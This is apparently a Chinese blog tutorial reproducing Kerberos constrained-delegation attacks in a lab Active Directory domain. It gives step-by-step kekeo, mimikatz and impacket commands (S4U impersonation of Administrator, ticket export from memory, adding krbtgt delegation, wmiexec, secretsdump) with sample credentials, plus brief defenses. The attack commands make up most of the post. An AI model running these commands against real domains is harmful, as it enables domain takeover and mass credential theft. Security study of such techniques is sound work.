约束委派+利用约束委派生成黄金票据

最新推荐文章于 2025-04-27 16:51:04 发布
原创 最新推荐文章于 2025-04-27 16:51:04 发布 · 1.8k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍如何在特定环境下,利用已知信息生成服务用户的TGT,进而伪造管理员访问域控CIFS服务的ST,以及如何通过约束委派创建变种黄金票据,实现对域内资源的访问。

环境

域: test.com
域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7
域内主机:系统:windows 2012R2,主机名:HyyMbb,ip:192.168.1.22
被委派用户test
测试用户test1

在这里插入图片描述

操作步骤

我们需要提前知道的信息
被委派用户的明文密码或者ntml

密码:123!@#qwe
ntml:e5ae562ddfaa6b446c32764ab1ebf3ed

1、已经知道服务用户明文的条件下,我们可以用kekeo请求该用户的TGT

tgt::ask /user:test /domain:test.com /password:123!@#qwe /ticket:test.kirbi

我们知道NTML也可以生成TGT

tgt::ask /user:test /domain:test.com /NTLM:e5ae562ddfaa6b446c32764ab1ebf3ed

参数:

/user: 服务用户的用户名(即设置的被委派的用户)

/password: 服务用户的明文密码

/domain: 所在域名

/ticket: 指定票据名称,不过这个参数没有生效,可以忽略

在这里插入图片描述得到服务用户TGT:TGT_test@TEST.COM_krbtgt~test.com@TEST.COM.kirbi


2、然后我们可以使用这张TGT通过伪造s4u请求以administrator用户身份请求访问AD(域控) CIFS的ST

tgs::s4u /tgt:TGT_test@TEST.COM_krbtgt~test.com@TEST.COM.kirbi /user:Administrator@test.com /service:cifs/AD.test.com

在这里插入图片描述

S4U2Self获取到的ST1以及S4U2Proxy获取到的dm08 CIFS服务的ST2会保存在当前目录下


3、然后我们用mimikatz(kekeo也可以)将ST2导入当前会话即可

kerberos::ptt TGS_Administrator@test.com@TEST.COM_cifs~AD.test.com@TEST.COM.kirbi

成功访问到ADcifs服务

在这里插入图片描述

注:

如果我们不知道服务用户的明文和NTLM Hash,但是我们有了服务用户登陆的主机权限(需要本地管理员权限),我们可以用mimikatz直接从内存中把服务用户的TGT dump出来

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit

在这里插入图片描述这样我们就能跳过第一步,直接进行二三步骤就可以了~~



利用约束委派打造变种黄金票据


环境

域: HYYMBB.com
域控:Windows server 2008R2, 主机名: AD, IP: 192.168.1.23
域内主机:系统:windows 2012R2,主机名:win2012,ip:192.168.1.22
被委派用户test
测试用户test1

这个实验我复现的时候在win2012的域控上未成功,据说是2012 及以后的KDC,受限委派的时候用的机制变成了 Resource Based Constrained Delegation

所以这个只能适用于win2008版本之前的(包括win2008)

我们都知道TGT的生成是由krbtgt用户加密和签名的,如果我们能委派域上的用户去访问TGS,那么就可以伪造任意用户的TGT了,黄金票据通常情况下我们是用krbtgthash来伪造TGT,不过我们通过约束委派也能达到同样的效果。

krbtgt默认是禁用的而且无法启用,所以我们无法使用界面来添加这个SPN

我们可以使用powershell来添加

Import-Module ActiveDirectory
$user = Get-ADUser test
Set-ADObject $user -Add @{ "msDS-AllowedToDelegateTo" = @("krbtgt/HYYMBB.com") }

在这里插入图片描述
这儿多说一句,有的同学发现一些用户属性没有委派的选项,那是因为这时的用户还不是服务账号,我们可以用系统的自带工具setspn来绑定spn

setspn -A test/test 用户名

更详细的用法请自行百度


注:域控默认安装ActiveDirectory,如果没有安装,可以下载dll:下载地址,然后导入就行了:import-module .\Microsoft.ActiveDirectory.Management.dll

我们获得的test用户的信息

密码:123!@#qwe
NTML:e5ae562ddfaa6b446c32764ab1ebf3ed

1、我们可以用impacket系列的getST向KDC请求administrator的TGT
getst.exe -dc-ip 192.168.1.23 -spn krbtgt/HYYMBB.com -impersonate Administrator HYYMBB.com/test:123!@#qwe

在这里插入图片描述参数:

-impersonate:表示伪造用户

-spn:表示我们要委派的服务的spn,这里是TGS

-dc-ip:域控ip

执行之后会在当前目录生成一个缓存文件Administrator.ccache


2、注入ptc(pass the cache)

kerberos::ptc Administrator.ccache

在这里插入图片描述
在当前终端退出后就可以访问域控了

在这里插入图片描述

3、执行命令

执行命令的话我们可以用impacket系列或者powershell都可以
这儿我们使用impacket中的wmiexec.exe

set KRB5CCNAME=Administrator.ccache

wmiexec.exe -no-pass -k administrator@AD.HYYMBB.com -dc-ip 192.168.1.23

在这里插入图片描述
导出域控上所有用户以及主机的hash

set KRB5CCNAME=Administrator.ccache

secretsdump.exe -no-pass -k AD.HYYMBB.com

防御


1、高权限用户没有在特殊要求之下设置为不可委派

在这里插入图片描述

为了防止凭据被盗微软推出了Protected Users组,适用于Windows Server 2016Windows Server 2012 R2Windows Server 2012

在这里插入图片描述

参考链接

红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
HACKONE的博客
06-23 626
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
域渗透非约束委派&Spooler
Longwaer
01-23 1415
学习掌握内网域渗透委派攻击中非约束委派,加上联合Spooler打印机的漏洞更好的了解漏洞原理。
Kerberos的黄金票据详解
weixin_30642267的博客
12-27 1240
0x01黄金票据的原理和条件 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与域控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。 Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的。TGT仅用...
黄金票据——域渗透
include_voidmain的博客
03-14 793
0x01前言 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。攻击者一旦拿到域管权限的账号就可以伪造出黄金票据,逃过账号和密码的验证,即使修改管理员密码,攻击者依然能通过黄金票据进行访问。 0x02原理 kerberos认证中Client通过AS认证后,AS会给Client一个由Client的Master Key加密过的和TGT,Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到NTLM就能伪造TGT和Logon session key,
内网渗透——黄金票据与白银票据
来日可期的博客
10-11 5661
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问和控制所有域内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
黄金票据~
Y22Lee的博客
06-04 1605
这里大家肯定有点矛盾,我既然都可以获取krbtgt,我直接使用域中的机器进行PTT就可以了,为什么还要用工作组中的机器(如果域中的机器有杀软呢?黄金票据的制作有多种方式,黄金票据本质上是伪造TGT,既然是伪造所以在任何电脑上都可以伪造,生成的TGT票据就可以打入内存(PTT),从而实现对整个域的控制,接下来我们看一下如何伪造。黄金票据一般是伪造的TGT,生成这个TGT,不需要和KDC进行校验,金票可以在本地直接生成生成的的金票在非域机器和域内机器都可以使用。第三步:获取伪造TGT使用的域SID和域名。
基于资源约束委派利用
qq_18811919的博客
02-25 1509
关于基于资源的约束委派本文章总共说了常用的三种利用方式: 1.Ntlm Relay+打印机bug+基于资源的约束委派拿下目标控制权 2.Acount Operators组权限滥用进行基于资源约束委派获取目标权限 3.拿下目标机器入域的域账号拿下目标控制权 以及一种绕过方式: 1.CVE-2020-17049 Kerberos Bronze Bit+基于资源的约束委派绕过敏感账号限制。
内网渗透—横向移动&非约束委派&约束委派
2301_76227305的博客
09-06 1294
约束委派约束委派的最大区别就是,一个是信任此计算机的任何委派,一个只是信任指定委派。从实际运用来说,非约束委派由于要让DC进行连接才能获得票据,所以有点鸡肋,就不如约束委派。其实说来说去,本质都是票据的伪造,然后进行票据传递。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
第135天:内网安全-横向移动&非约束委派&约束委派&数据库攻防
weixin_71529930的博客
08-24 845
约束委派存在不安全性,所以微软在Windows server 2003中引入了约束委派约束委派攻击主要利用被控主机设置了域控的CIFS服务的约束委派,则攻击者可以先使用S4u2seflt申请域管用户访问被控主机的ST1,然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管。利用该身份就可以访问域控,记得用主机名去访问。(域控)访问具有非约束委派权限的机器。
DAY182内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
m0_74402888的博客
01-13 1441
简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
内网渗透--Golden Ticket(黄金票据)制作&利用
qq_62169455的博客
01-17 3129
伪造TGT,不需要和KDC进行校验,金票可以直接在本地生成,在域内机器和非域内机器都可以使用。
黄金票据和白银票据
weixin_57239983的博客
04-27 1014
黄金票据是攻击者通过获取域控制器(DC)中KRBTGT账户的密码哈希值,伪造的Ticket Granting Ticket(TGT)。持有黄金票据的攻击者可以伪造任意用户的身份,获取域内任意服务的访问权限,且票据有效期可自定义(默认10年),具有极高的持久性和隐蔽性。ST是Kerberos认证流程中用于访问特定服务的票据。与黄金票据不同,白银票据仅针对特定服务(如CIFS、LDAP、MSSQL等),无需与域控制器交互,且票据有效期默认较短(通常为10小时),但隐蔽性更高,不易被检测。
黄金票据与白银票据
未花的博客
04-03 336
由于某些原因导致域管权限丢失,但是还有普通域用户权限,正好管理员在加固域的时候没有重置krbtgt密码。TGS:Ticket Granting Server 票据授予服务器。知道服务器的Hash,可以访问服务器的某些服务而不用于kdc进行交互。TGT:Ticket Granting Ticket 票据授权票。ST:Service Ticket 服务票据黄金票据就是伪造的TGT,AS返回的票据。白银票据就是伪造的ST,TGS返回的票据。白银票据就是服务票据
域渗透委派攻击之约束委派
qq_56426046的博客
11-13 1079
(7) 如果请求中包含 PAC,则 KDC 通过检查 PAC 的签名数据来验证 PAC ,如果 PAC 有效或不存在,则 KDC 返回 ST2 给 service1,但存储在 ST2 的 cname 和 crealm 字段中的客户端身份是用户的身份,而不是 service1 的身份。不同于允许委派所有服务的非约束委派约束委派的目的是在模拟用户的同时,限制委派机器/帐户对特定服务的访问。已知在约束委派的情况下,服务用户只能获取某个用户或者主机的服务ST,只能用模拟用户访问特定的服务,
域渗透——哈希传递、黄金票据
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-30 985
域渗透 1. 安装域 接着点击安装向导 加入域: 需要设置dns服务器为域控机 域控可以登陆任意域中的电脑 Windows认证协议 - Kerberos,也可以叫做票据 我们查看域控 在cmd输入 net user /domain 还可以在dns里查看,一般dns都是域控机 当我们获取到了administator的权限的时候,我们可以利用windows官方的工具去提权 指令: psexec -i -d -s cmd.exe//获取权限 然后再次输入net user /domain,就可以获取域
复现黄金票据
Twilight_o的博客
04-03 1178
黄金票据(golden ticket)攻击,是一种为任意用户生成TGT票据的方法,属于一种后门。黄金票据生成,是生成有效的TGT Kerberos票据,并且不受TGT生命周期的影响(TGT默认10小时,最多续订7天),那么,这里可以为任意用户生成黄金票据,就可以为域管理员生成TGT,普通用户就可以变成域管理员。这里主要简单说一下Kerberos认证方式,这是一种基于票据的认证方式,有客户端、服务器和KDC(DC,Domain Controller)组成。2.清空票据 #防止之前的票据对新作的票据产生影响。
kerberos、黄金票据、白银票据
m0_73826804的博客
02-20 1571
白银票据:实际就是在抓取到了域控服务hash的情况下,在client端以一个普通域用户的身份生成TGS票据,并且是针对于某个机器上的某个服务的,生成的白银票据,只能访问指定的target机器中指定的服务。/sid:SID值,(这里要是使用系统命令的话抓到是这样的SID,最后面的值代表着这个账号的SID值,注意是去掉最后一个-后面的值!黄金票据:是直接抓取域控中ktbtgt账号的hash,来在client端生成一个TGT票据,那么该票据是针对所有机器的所有服务。白银票据就是伪造的ST,TGS返回的票据
域内渗透约束委派
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
09-20 3723
域渗透约束委派利用
约束委派
最新发布
06-28
Windows域环境中,约束委派(Constrained Delegation)是一种用于限制服务或用户代表其他用户访问资源的机制。它通常用于需要跨域访问或服务间通信的场景中,同时提供更高的安全性。 ### 配置方法 约束委派可以通过Active Directory中的属性进行配置,具体步骤如下: 1. **设置约束委派**:通过修改`msDS-AllowedToDelegateTo`属性来定义允许委派的目标服务。此操作需要对目标计算机对象具有写入权限,通常要求域管理员权限或特定委托权限[^4]。 2. **查询约束委派**:可以使用工具如AdFind来查询域内或域外的约束委派用户或主机。例如: - 域内查询约束委派用户: ```shell AdFind.exe -b "DC=test,DC=lab" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto ``` - 域外查询约束委派主机: ```shell AdFind.exe -h 192.168.10.2 -u test -up test.com -b "DC=test,DC=lab" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto ``` ### 使用场景 1. **服务间通信**:当一个服务需要以用户的名义访问另一个服务时,可以使用约束委派来确保安全性和控制性。例如,Web服务器可能需要访问数据库服务器来获取用户请求的数据。 2. **跨域资源共享**:在多域环境中,约束委派可以用于允许某个域的服务代表用户访问另一个域中的资源,前提是两个域之间存在信任关系[^5]。 3. **自动化任务**:在需要执行自动化任务的情况下,约束委派可以帮助确保任务能够以适当的权限运行,而不暴露过多的权限。 ### 安全注意事项 - **最小权限原则**:仅授予必要的权限,避免过度授权。 - **定期审计**:定期检查和更新约束委派配置,确保其符合当前的安全策略。 - **环境变量保护**:在使用工具如mimikatz时,注意保护环境变量(如KRB5CCNAME),以防止票据泄露。 通过以上方法和场景的应用,可以在保证安全的前提下,灵活地管理和利用约束委派功能。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值